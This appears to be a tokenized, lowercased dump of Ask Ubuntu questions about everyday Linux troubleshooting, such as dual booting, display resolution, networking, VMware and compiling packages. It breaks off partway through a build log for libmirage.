359587	how to pass a { sv } arguments to gdbus ?	i have problem to passing the arguments of the function in a dictionary format ( string , variant ) ; i try to run a screencast in gnome and to start the function i need to pass these asrguments : -method name= '' screencast '' - -arg type= '' s '' direction= '' in '' name= '' file_template '' /- -arg type= '' a { sv } '' direction= '' in '' name= '' options '' /- -arg type= '' b '' direction= '' in '' name= '' flash '' /- -arg type= '' b '' direction= '' out '' name= '' success '' /- -arg type= '' s '' direction= '' out '' name= '' filename_used '' /- -/method- this is my call : ~ $ gdbus call -- session -- dest org.gnome.shell.screencast -- object-path /org/gnome/shell/screencast -- method org.gnome.shell.screencast.screencast `` test_ % d_ % t.webm '' { dict : string : variant : '' draw-cursor '' , true , '' framerate '' ,35 , pipeline , '' vp8enc min_quantizer=13 max_quantizer=13 cpu-used=5 deadline=1000000 threads= % t ! queue ! webmmux '' } this is the rror output : `` a { sv } '' : 0-33 : can not parse as value of type 'a { sv } ' . error is in the syntax ? thx
359591	how do i fix loud fan noise and heat on my sony vaio ?	i have sony vaio with amd e2-2000 ( 1,75ghz ) processor , 4gb ram , and it runs windows 8 as a default os . after i installed ubuntu 13.04 , it worked but the fan sound got louder and the laptop would heat faster . what should i do to fix this problem ? i have tried looking for ubuntu netbook edition but it seems its no more supported .
359592	how do i set up a kiosk that uses java and plays a . jar file only ?	if we had a untouched ubuntu server , and we wanted to put on it , lets say : minecraft and have it so that it ran minecraft only ... what steps would we take to make the dream reality ? i mean setting up a minecraft server/client as a kiosk should n't be that difficult , should it ? all in all , how do i set up a blank ubuntu server that runs only minecraft ( or other jar file ) ?
359593	is it possible to monitor dconf for changes ?	i would like to monitor dconf for changes so that while i tinker with settings , applications and the like i can see what keys are changed , if any . is there a way i can accomplish this ?
359595	ubuntu server setup package	i would like to ask about setting up my own server with ubuntu , at the moment i am paying for hosting on a vps running ubuntu which i pay âł50 per month for starters which as the site grows it will go into the âł100 's but at the moment i work from home and would like to have my own server but i do not have a clue which way to turn ... .what would i need ? just the hardware and ubuntu to run my website ? the control panel i use is plesk which is costing more fees onto of hosting fees do i need all this ? what would it cost for set up ? please . please see the following details of my server at the moment . vps vcpus : 2 vcpus memory : 2 gb system drive : 100gb snapshot backup os : linux ubuntu 12.04 64 bit mysql thanks for you time best regards mark
359602	how to install ubuntu in a ppc ibook g4 ?	do ubuntu live cds have to be powerpc to boot into them on an ibook g4 ( mid 2005 ) ? i have n't tried yet , but i was wondering because i am thinking of running ubuntu on it .
359606	inspiron n5050 resolution dual displays	ringtail ( 13.04 ) gnome and unity running find on teen 's inspiron n5050 . she has connected hdmi cable multiple times to watch missed shows . today while trying to connect tv to her hdmi , the computer resets to 640x480 screen size and can not watch sleepy hallow . both units , tv and laptop are at 640x480 , but when unplugged , laptop returns to the normal display . despite researching and doing the look into config files . can not figure out why it changes from one resolution to the lower when the second driver for the hdmi starts streaming video to the samsung 48 inch display . display settings show a samsung 7 '' . so , a 7 '' ? not 48 ? how and why ? she changed nothing on her computer , no software downloads , no settings changed . any ideas as to why resolution changed ? dmesg shows connection . ( i am on another computer now , she is watching it on the small screen ) . have tried using an xfce interface but that did not correct the interface she uses most . i have renamed 'sessions ' in .cache to a broke file area . ( for comparison 's later ) her video is an intel sandybridge , with i3 cpu , 3g ram . i have not asked for her computer to hack on for more than 30 seconds yet . so , before i do , any guesses on what the change in config might have been ? a flipped bit , corrupted file , i understand . just point me the way .
359607	software center crashes . please help !	there is a problem opening the ubuntu software center , it pops up and seems to be loading and just crashes . here is the output of running the command : software-center in the terminal : 2013-10-15 17:32:01,767 - softwarecenter.ui.gtk3.app - info - setting up proxy 'none' 2013-10-15 17:32:01,772 - softwarecenter.db.database - info - open ( ) database : path=none use_axi=true use_agent=true 2013-10-15 17:32:02,139 - softwarecenter.backend.reviews - warning - could not get usefulness from server , no username in config file 2013-10-15 17:32:02,272 - softwarecenter.ui.gtk3.app - info - show_available_packages : search_text is '' , app is none . 2013-10-15 17:32:02,738 - softwarecenter.db.pkginfo_impl.aptcache - info - aptcache.open ( ) traceback ( most recent call last ) : file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 243 , in open self._cache = apt.cache ( gtkmainiterationprogress ( ) ) file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 102 , in __init__ self.open ( progress ) file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 145 , in open self._cache = apt_pkg.cache ( progress ) systemerror : e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/mx.archive.ubuntu.com_ubuntu_dists_precise-updates_main_i18n_translation-en , e : the package lists or status file could not be parsed or opened . 2013-10-15 17:32:06,228 - softwarecenter.db.enquire - error - _get_estimate_nr_apps_and_nr_pkgs failed traceback ( most recent call last ) : file `` /usr/share/software-center/softwarecenter/db/enquire.py '' , line 115 , in _get_estimate_nr_apps_and_nr_pkgs tmp_matches = enquire.get_mset ( 0 , len ( self.db ) , none , xfilter ) file `` /usr/share/software-center/softwarecenter/db/appfilter.py '' , line 89 , in __call__ if ( not pkgname in self.cache and file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 263 , in __contains__ return self._cache.__contains__ ( k ) attributeerror : 'nonetype ' object has no attribute '__contains__' traceback ( most recent call last ) : file `` /usr/bin/software-center '' , line 176 , in < module > app.run ( args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 1422 , in run self.show_available_packages ( args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 1352 , in show_available_packages self.view_manager.set_active_view ( viewpages.available ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/session/viewmanager.py '' , line 154 , in set_active_view view_widget.init_view ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/panes/availablepane.py '' , line 171 , in init_view self.apps_filter ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 238 , in __init__ self.build ( desktopdir ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 511 , in build self._build_homepage_view ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 271 , in _build_homepage_view self._append_whats_new ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 450 , in _append_whats_new whats_new_cat = self._update_whats_new_content ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 439 , in _update_whats_new_content docs = whats_new_cat.get_documents ( self.db ) file `` /usr/share/software-center/softwarecenter/db/categories.py '' , line 124 , in get_documents nonblocking_load=false ) file `` /usr/share/software-center/softwarecenter/db/enquire.py '' , line 317 , in set_query self._blocking_perform_search ( ) file `` /usr/share/software-center/softwarecenter/db/enquire.py '' , line 212 , in _blocking_perform_search matches = enquire.get_mset ( 0 , self.limit , none , xfilter ) file `` /usr/share/software-center/softwarecenter/db/appfilter.py '' , line 89 , in __call__ if ( not pkgname in self.cache and file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 263 , in __contains__ return self._cache.__contains__ ( k ) attributeerror : 'nonetype ' object has no attribute '__contains__' jakk @ jakk-satellite-l655d : ~ $ traceback ( most recent call last ) : file `` /usr/share/software-center/update-software-center-agent '' , line 73 , in < module > cache = apt.cache ( memonly=true ) file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 102 , in __init__ self.open ( progress ) file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 145 , in open self._cache = apt_pkg.cache ( progress ) systemerror : e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/mx.archive.ubuntu.com_ubuntu_dists_precise-updates_main_i18n_translation-en , e : the package lists or status file could not be parsed or opened .
359613	how do i force fullscreen flash playing on a multi-monitor setup using libpepflashplayer.so ?	i have 2 monitors , and i am using google chrome . when i watch a video in full screen on one monitor and then click on the other monitor it minimizes youtube to the embedded playback . i will not be able to use the other flash player found in chrome : //plugins/ so it definitely has to be done through /opt/google/chrome/pepperflash/libpepflashplayer.so how can i make it stay in full screen mode ? i should note that i am using compiz . what is the action that tells youtube that is not the active app when you click on somethign outside of it. ? i want to find it and break it .
359622	how to compile a program from launchpad	i tried looking through the documentation but i could n't figure it out . make and ./configure do n't work so i thought i would ask here . i 'm trying to install this ( https : //launchpad.net/livewallpaper ) on 13.10 . i 've extracted it to /usr/local/src . i 've installed build essentials , checkinstall , cvs , mercurial , git-core , and subversion . what terminal commands do i need to run to install it ? colton @ persistence : /usr/local/src/livewallpaper-0.4.1 $ make make : *** no targets specified and no makefile found . stop . colton @ persistence : /usr/local/src/livewallpaper-0.4.1 $ ./configure bash : ./configure : no such file or directory colton @ persistence : /usr/local/src/livewallpaper-0.4.1 $
359625	ubuntu not showing icons on oracle visual box in windows operating syste,	after choosing the trail option on the visual box , ubuntu loads but without its icons . tried rebooting till no display
359632	could n't find /boot/grub/menu.lst ; how to add usb drive in grub menu	i am using ubuntu 10.04 . i have created the ubuntu iso image on a 2gb usb drive . i want to add this usb drive as a boot option in the grub menu . as per the manual https : //help.ubuntu.com/community/bootfromusb , there is supposed to be a /boot/grub/menu.lst file where i can edit the menu to add my usb drive as a possible boot option but i do n't see the menu.lst file can anybody suggest how to add my usb drive as a boot option in the grub menu ? as it turned out that i did n't need to add my usb as a boot option in grub menu . i was not being able to track the bios setup utility for the make of my machine and hence setting the boot order . since i have figured out setting up the boot order using the bios setup utility ( press f9 , in my case ) , i am closing this question and marking as solved .
359636	why am i missing a partition ?	when i installed ubuntu 13.04 ( mainline no-edits version ) i selected the option which seemed fair which was `` install ubuntu 13.04 ... over windows 7 , this i assumed meant just the drive which contained windows 7 but once the installation finished i found there to be a problem with my partition being missing . is there an easy explanation for this or is it just general user area . i am new to this stuff james buckley / ) bro hoof
359637	trying to access to /dev/sda3 gives me an error	i 'm new at this , so i need a little help . i 've installed ubuntu 13.04 alongside windows 8 . when i tried the live session of ubuntu i remember i could access all my hard drives , but now when i click on some disk , it gives me this error message : error mounting /dev/sda3 at /media/clau/clau : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sda3 '' `` /media/clau/clau '' ' exited with non-zero exit status 14 : the disk contains an unclean file system ( 0 , 0 ) . metadata kept in windows cache , refused to mount . failed to mount '/dev/sda3 ' : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option . i 've researched on the internet , and i think i have to mount them individually , but i 'm not sure how . i know acceding to windows partition it 's not really good , but i only want to access to that drive where i have all my files ! i already have disabled fast-boot on windows 8 , but it 's still the same . edit : i already mounted it , but only in read-only mode : ` ( well , so i suppose it 's a problem of windows or the disk is corrupt or something . how i can fix it ? on windows i can use them normally .
359639	battery not present xps 15z u13.10	so i recently reopened my old laptop which was running ubuntu 12.04 lts . when i opened it , i noticed the battery was stated has ''not present '' in the top menu bar . when i click on that label , it gets me to the power statistic menu where i can choose between latop battery and ac adapter . if i click on the battery tab . it tells me those confusing informations : everything there is to id . my battery ( serial , producer , model , max wh , voltage.. ) but it also says charging but the charge does not go up . it also says rechargable yes and present yes . so i have got an os that says the battery is not present , but it 's charging because it 's present but it 's not charging because it 's not there ... quite surprising lol . so before taking out the battery or replacing the ac ( i do know both function properly ... ) i went in the bios . since it 's a dell laptop there is an indicator of the health of my battery and if the ac adapter is working properly ... guess what , the battery is healthy and the ac adapter is too . so i upgraded to 12.10 , 13.04 and 13.10 hoping there would be a fix ... there was none , and what is even more strange , is that the battery actually did work before i let my laptop in a locker for 5 months ... can someone help me out , i would really like to get the use of the battery again ... .
359643	installing ubuntu 13.04 repartitioning problem	i wish to install and dual boot ubuntu 13.04 on my computer but i have encountered the following problem : http : //i.imgur.com/l5osfqh.png if it is n't obvious , i am using ubuntu from the cd , not from my drive . i am trying to install it on my hd . do n't think i am trying to install ubuntu in ubuntu . if all current partitions are removed ... do i lose or erase all of my files when doing so ? i ca n't just go forward to install now because the following happens : what can i do ? i just want to run ubuntu 13.04 alongside windows 8 , but the option was n't available . please be as descriptive as possible , have mercy on this ubuntu noob .
359646	ubuntu 13.04 and ms sculpt keyboard	interestingly , the `` - '' and `` h '' and other very specific letters / characters do not work . for example , h works , shift works , but shift+h is n't recognized . i 'm going to give keytouch a try but was wondering if anyone else ran into this issue as well ?
359648	ca n't run ubuntu after installing windows 8	i have ubuntu 12.04 and it work with me very well . i want to re-install windows 8 and now i ca n't open ubuntu or boot on it what can i do please help me ? ? i am tring to use apps on windows to make my partion that i installed ubuntu on it and it do n't work . and if i ca n't run it again if there any way to restore my apps and my files on the desktop : / and if there any way to restore ubuntu with losing windows i will do it .
359652	windows 7 wo n't boot or recover after ubuntu 13.04 installation	i 'm completely new to linux and ubuntu and have gotten in over my head very badly . i want to dual boot windows 7 and ubuntu , so i had a fresh install of windows 7 , everything worked fine , then i followed directions to install ubuntu in the proper way to dual boot , but since then , i have been unable to get windows to work at all . from the grub page , if i try to run windows normally , it says it 's inaccessible due to a recent software change . if i run the recovery , it starts to run , it loads all the files , takes me to a grey background screen , sits for a couple seconds , then my computer restarts . i tried using a windows 7 recovery disk and that got me nowhere , with a message that said `` no drives were found . click load to provide a mass storage driver for installation '' ( if i click load , it says `` to install the device driver needed to access your hard drive , insert the installation media containing the driver files , and then click ok '' ) . i tried using boot-repair , i did the common repair and that changed nothing , but here is the link it gave me if this helps paste.ubuntu.com/6243271/ also , in boot-repair , i tried the advanced options > other options > '' repair windows boot files '' but i ca n't click it , it 's just greyed out . i would try the bootrec.exe /fixboot and bootrec.exe /fixmbr as suggested many places online , but i ca n't get any sort of dialogue box on the windows recovery disk i made . i 'm really beyond my knowledge and have been trying different things for about 6 hours now with no success at all . i think maybe i messed up the partitioning when i installed ubuntu , but i really do n't know anything about that . here 's what it looks like now , after being ripped apart trying to fix things based on other info online and error messages http : //i.stack.imgur.com/nvznt.png i 'll do my best to provide any other information needed to solve this , but try to put it in idiot terms as best as possible for me .
359653	clean install of ubuntu 12.04	i just want to ask if how to install ubuntu in windows . i want to make it in clean install , i do n't want to use dual bot or alongside boot . but i don ; t know what to do , cause i 'm new to this os . please provide me a step by step process of it . it would be great . thanks
359654	can i dd if=/dev/sda to of=/dev/sdc3 ( drive to partition )	can i dd if=/dev/sda of=/dev/sdd3 ( copy drive to partition ) ? will it be a problem ? the source and destination drives with their respective partitions are as follows : -- source drive details -- disk /dev/sda : 250.1 gb , 250059350016 bytes 255 heads , 63 sectors/track , 30401 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000551f2 device boot start end blocks id system /dev/sda1 * 1 29300 235346944 83 linux /dev/sda2 29300 30402 8849409 5 extended /dev/sda5 29300 30402 8849408 82 linux swap / solaris -- destination drive details -- disk /dev/sdd : 1000.2 gb , 1000204883968 bytes 255 heads , 63 sectors/track , 121601 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x5c78d991 device boot start end blocks id system /dev/sdd1 1 64235 515960032+ 7 hpfs/ntfs /dev/sdd2 64235 89731 204798976 7 hpfs/ntfs /dev/sdd3 89731 121602 256000000 7 hpfs/ntfs
359657	wireless disabled at the bios level upon boot	my brother 's netbook no longer wants to connect to wireless . i helped him install ubuntu a few weeks ago , and the wireless worked perfectly for a while . after he tried to reset something ( he does n't remember what exactly he did ) , all references to the wireless card disappeared in ubuntu . i looked in bios , which said that the wireless card was disabled . i enabled the card in bios setup and booted into ubuntu , but things looked the same as before : the system claimed it had no wireless card . i repeated this several times ; each time i looked in bios the wireless was disabled again . i booted into an arch install disk i have on usb ( enabling wireless in bios again ) , and everything was fine : the card was detected , and i was able to connect to the internet . however , each time i boot ubuntu , the wireless card gets disabled in bios again . this makes me think that something in ubuntu is the source of the problem . how can i fix this ? the netbook is an eee pc 1000h , and the wireless card is a ralink rt2790 . the ubuntu is version 13.04 . edit : a little more info about what my brother was doing : after losing a connection while the microwave was running ( perfectly normal ) , he tried to reset his adapter to reconnect to the wireless , which was not happening automatically ( or had n't happened right away ) . when i was asked for help , i saw that the wireless icon in the tray said that networking was disabled . when i clicked `` enable '' , it said that no connections were active on ethernet or vpns , and did n't mention wireless .
359660	can i use my pc to install linux/ubuntu to my external drive to be used on another pc ?	long story short . i have a decent pc in the other room that has no internet . so i want to install linux/ubuntu onto a external 1.5tb hard drive so i can run the other pc on it . how ever , i do not want linux/ubuntu to effect this pc at all . please help . ps : in case you cant tell , i have no idea what im doing . i am computer friendly however i am very unfamiliar with linux/ubuntu . im not even sure i know what it is . i just cant afford to buy windows 7 .
359661	hdmi audio not working	i just installed ubuntu on a dell 1535 laptop . everything is working great except i have no audio when i hook the hdmi up to a tv . in the sound settings there is n't even an option for hdmi output , only headphones and internal speakers . what should i be doing ? i 'm new to linux and do n't know where to start with this .
359662	ubuntu server 12.04 name resolution	i just installed ubuntu server 12.04 and for my surprise network configuration has changed . basically , by default the /etc/network/interfaces has a dynamic ip address : auto eth0 iface eth0 inet dhcp with such a configuration i can ping any internet site ... however , when i changed it to : auto eth0 iface eth0 inet static address 192.168.0.120 netmask 255.255.255.0 gateway 192.168.0.1 dns-nameservers 192.168.0.1 things just stop work ! ! ! i 've read the manual page hundred times to see what a hell i 'm doing wrong and i just could not found what ! ! ! any help is appreciated .
359666	overclocking graphics card ? lubuntu 13.04	i 've recently built a little computer for entry gaming , but some games i do enjoy just do n't cut the job . i 'd like to get a few more frames , maybe up to 40 , i 'm already at about 30 but more fps the better . i 've enabled coolbits and that did n't work , i did `` 1 '' for my coolbits and it did n't work , nvclock does n't work , and everything else i 've tried just does n't cut it . there 's some that requires wine , a usb , and a few other programs like unetbootin , but that was to much stuff and my gpu was n't supported . here 's my system : os : lubuntu 13.04 athlon ii x4 640 4.2 ghz 2gb ddr3 ram ( upgrading to 4 ) galaxy gt 640 factory oc gigabyte 760g s2p i 'm currently running drivers 319.60 too .
359667	installing vmware player 6.0.0 on 12.04.3 lts ca n't find kernel headers	so i had a problem , and did a lot of searching , and found part of the answer here in vmplayer problem - vmware kernel module updater does n't run since 13.04 upgrade but i could not post what worked for me , so i am opening this 'question ' to document how i solved this issue , to help future searchers . installing vmware player 6.0.0 on ubuntu 12.04.3 lts during install , got error messages saying it could not find gcc . i pointed it to gcc using 'browse ' , but then it could not find the kernel headers . i installed the kernel headers using $ sudo apt-get install build-essential linux-headers-`uname -r` they installed into /usr/src/linux-headers-3.2.0-44 , but using browse vmware still could not find them . instead of using the gui , i tried to compile the modules from the command line , using $ sudo vmware-modconfig -- console -- install-all and now vmware player starts .
359669	how to backup windows 8 recovery partion from linux ?	my windows 8 does not boot any more ( i get an error message ) , but i still have the recovery partion , so before i mess every thing even more , i want to backup my recovery .
359670	what is the difference between an aptitude proxy and mirror ?	what is the difference in apt-get between a proxy and a mirror ? i would expect the first one to be a simple cache and the other to be a full copy but some thing i am reading challenge this assumption . i am currently poking around vmbuilder and while following the tutorial here https : //help.ubuntu.com/lts/serverguide/jeos-and-vmbuilder.html i encountered a roadblock : apt-proxy does n't exists anymore ( or at least i ca n't find it on precise ) . so i installed apt-cacher instead ( 1 ) . i tried to use apt-cacher but i got the error with vmbuilder that it did n't work . so i pocked around vmbuilder and saw the `` proxy '' option which seemed right ... but the tutorial use the mirror option ! so if apt-proxy ( which by definition should be a proxy ) is used as a mirror , what is the difference between a mirror and a proxy ? ( 1 ) tangential question : is apt-cacher the recommanded way to set-up a mirror/proxy and if not what is ? i only want to cache .
359673	wrong monitor resolution after suspend	after resuming suspend , i get 1600x1200 but the right one is 1600x900 . i 've managed to set it through shell using `` xrandr -- output crt1 -- auto '' , but a script /etc/pm/sleep.d/99_restoreresolution.sh does n't do anything , i 've found it searching google . the content of the script it 's here : http : //pastebin.ca/2467188 what should i do ? thanks in advance . raring ringtail amd64 / ati hd 6670 / amd x2 5200+
359674	application to reproduce mac os x full screen mode ?	i am currently running xubuntu 13.04 , but this would also be cool on stock ubuntu . i am a big fan of the way full screen works in mac os x , and would like to reproduce the effect on linux with workspaces . i like how a maximized application never covers up windows . my question is , is there a program or script that helps with the following move windows to their own workspace when they are maximized allow only one maximized window in a workspace move the window back out of the workspace when it is restored or replicates the mac os x feature in a different way . this is my first post so feel free to move it to a different forum , etc . if i made a mistake . i did n't see any forum guidelines to read ... thanks for your help , if this is a wild goose chase i apologize .
359675	netflix desktop produces blank screen	when i launch netflix desktop , the browser just produces a blank screen . i can navigate to other sites fine . but if i try to return to the netflix site , blank screen . i thought it could be silverlight , but not the right symptoms , and rm -rf ~/.wine-browser produced no results . i thought it could be the ext3 file system , but when i look at /etc/fstab i see i am running ext4 . so that 's not it . i have completely uninstalled and reinstalled and purged and anything else . oy ! still nada . i am running ubuntu 13.04 . i 've tried it in gnome and unity with the same results . my version of wine is 1.4.1 . i do n't know what version of compholio , or if there even is one . i 'm not sure what video drivers i use on this laptop , but the netflix desktop worked once before a few months back . not sure what is different now . ideas ? update : i followed the instructions at problems with netflix-app after upgrading to 13.04 and the problem is solved .
359678	found someone lurking in my lan , not sure what to do next	i have dd wrt router with internal numbers all falling within 192.168.1.0/24 . i was looking on my firewall records this morning and found someone at 10.10.109.100 got blocked from accessing port 5353 udp . also there seems to be a lot of multicast to 224.0.0.251 using this same 5353 port . the computer it was accessing is my daughters little ubuntu box running linux mint . now i 'm seeing a ton of activity with the 192.168.1.255 address of my lan ( not sure what that means ) accessing ports 137 and 138 netbios of my daughters ubuntu . but i 'm mostly concerned about the 10.10.109.100 as i know that is a privately assigned address . a few weeks ago i saw something similar but it was at 192.168.160.4 which i do n't have anything assigned to at all . i did a nmap scan for 10.10.109.0/24 and found nothing . what can i do to figure out what the deal is ? see attached screenshot from my firewall .
359686	in ubuntu , is there any terminal that allows for the position of the cursor to be moved with the mouse ?	for example , if i find i miss one letter in a long command , currently i need to press â to move the cursor , which is slow . why ca n't we use mouse to put the cursor in the place we want ?
359688	digi sol not connected to internet	my house is connected by wi fi modem , except ubuntu everything is connected . ubuntu connects but could not use .
359692	process not running in background	< ? php while ( true ) { set_time_limit ( 2 ) ; $ reas = '' wake up from sleep ! ! ! ! ! ! ! ! ! ! \n `` ; echo $ reas ; sleep ( 5 ) ; // $ readlen = 0 ; } ? > i try to run this code . in foreground , it runs perfectly . but when run it in background and check the process , the id is not found . i 've tried to use the top command to check and nohup php p2.php & to get the process id , but when i try to kill the process using kill 1234 i get a error message `` no such process '' . what is wrong in my code ? how do i run it in background and make it display in top ?
359693	problem updating to python 3.3 on ubuntu 12.04 lts ?	i have recently installed ubuntu 12.04 lts and i wanted to upgrade the python version to 3.3 , but i am having some problems doing it . whenever i run this command , sudo apt-get install build-essential i get the following errors : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package build-essential can anyone tell me what is happening ?
359694	screen refresh rate problem in 13.04 and 13.10	i determined my screen resolution using the xrandr command and it gives the following message : screen 0 : minimum 320 x 200 , current 1366 x 768 , maximum 32767 x 32767 vga1 connected primary 1366x768+0+0 ( normal left inverted right x axis y axis ) 410mm x 230mm 1366x768 59.8*+ 1280x1024 60.0 1280x720 60.0 1024x768 60.0 800x600 60.3 640x480 60.0 720x400 70.1 hdmi1 disconnected ( normal left inverted right x axis y axis ) dp1 disconnected ( normal left inverted right x axis y axis ) virtual1 disconnected ( normal left inverted right x axis y axis ) here is the problem : if i scroll down some text , or minimize or maximize a window , traces of earlier text remain on the screen , and this makes me believe that it is a screen refresh rate problem . i tried the following command : sudo dpkg-reconfigure -phigh xserver-xorg but it does not seem to make any significant changes to the screen or its configuration even after restart . makes : monitor : hp compaq le1902x , computer motherboard : intel core 2 duo .
359696	i 'm having trouble running a python script and then continuing with my bash script	i am using tcprelay.py from usbmuxd to forward local port 2222 to remote port 22 so that i can ssh into my iphone over usb . if i run python ~/downloads/usbmuxd-1.0.8/python-client/tcprelay.py -t 22:2222 it successfully forwards the port , and in another terminal window , i can run ssh -l root -p 2222 127.0.0.1 and successfully use ssh over usb . however , i am trying to combine this into one command , and python ~/downloads/usbmuxd-1.0.8/python-client/tcprelay.py -t 22:2222 ssh -l root -p 2222 127.0.0.1 does not work . after running the python command , i can not run any other commands in that window . how would i go about putting these two commands together ? thank you
359699	connecting to an 802.1x network while running ubuntu on vmware	i am currently running ubuntu on vmware since my disks only have dynamic partitions and not basic partitioning . when i am home , i am able to connect to the internet while running ubuntu . however , when i am in the college , which uses 802.1x network , and after providing the user name and password too , i am unable to connect to the net using auto ethernet . is there some other way to connect to the net in this case ?
359706	downloaded ubuntu , but why am i unable to boot from flash drive ?	i downloaded ubuntu into my downloads then sent it to a flash drive . rebooted and changed the boot order making the usb the first option in both the menu and the order . restarted the computer over and over and it continually loads the previous window 7 ultimate o.s . i have checked the flash drive and it has ubuntu 12.04.3 desktop- i386 disk image file and ubuntu 12.04.3 desktop- i386 . crdownload cr download file on the drive . what am i doing wrong ?
359710	how do i install cdemu ?	i just installed ubuntu and made it as flexible as possible i 'm stuck while installing cdemu . i successfully installed vhba module as instructed by them now i 'm stuck at compiling libmirage . when i compile it it gives me the error : dh_install dh_install : libmirage9 missing files ( usr/lib/*/lib*.so . * ) , aborting make : *** [ binary ] error 255 dpkg-buildpackage : error : fakeroot debian/rules binary gave error exit status 2 please help me . so here is the overall view of what i wanted to do . i downloaded the lib mirage package from http : //cdemu.org/about/libmirage/ . this page explains every requirement and methods to compile the package . i did exactly as http : //cdemu.org/debian/ page said , but when this is done , i got the error above as the final line : '' install the project ... /usr/bin/cmake -p cmake_install.cmake -- install configuration : `` '' -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/lib/libmirage.so.9.0.0 -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/lib/libmirage.so.9 -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/lib/libmirage.so -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/include/libmirage/mirage.h -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/include/libmirage/mirage-cdtext-coder.h -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/include/libmirage/mirage-context.h -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/include/libmirage/mirage-contextual.h -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/include/libmirage/mirage-debug.h -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/include/libmirage/mirage-disc.h -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/include/libmirage/mirage-disc-structures.h -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/include/libmirage/mirage-error.h -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/include/libmirage/mirage-file-filter.h -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/include/libmirage/mirage-fragment.h -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/include/libmirage/mirage-index.h -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/include/libmirage/mirage-language.h -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/include/libmirage/mirage-object.h -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/include/libmirage/mirage-parser.h -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/include/libmirage/mirage-plugin.h -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/include/libmirage/mirage-sector.h -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/include/libmirage/mirage-session.h -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/include/libmirage/mirage-track.h -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/include/libmirage/mirage-types.h -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/include/libmirage/mirage-utils.h -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/include/libmirage/mirage-version.h -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/share/gir-1.0/libmirage-2.1.gir -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/lib/girepository-1.0/libmirage-2.1.typelib -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/share/gtk-doc/html/libmirage/miragecontextual.html -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/share/gtk-doc/html/libmirage/miragefilefilter.html -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/share/gtk-doc/html/libmirage/libmirage-version.html -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/share/gtk-doc/html/libmirage/miragesession.html -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/share/gtk-doc/html/libmirage/api-reference.html -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/share/gtk-doc/html/libmirage/left.png -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/share/gtk-doc/html/libmirage/libmirage-main.html -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/share/gtk-doc/html/libmirage/libmirage-debug.html -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/share/gtk-doc/html/libmirage/miragesector.html -- installing : 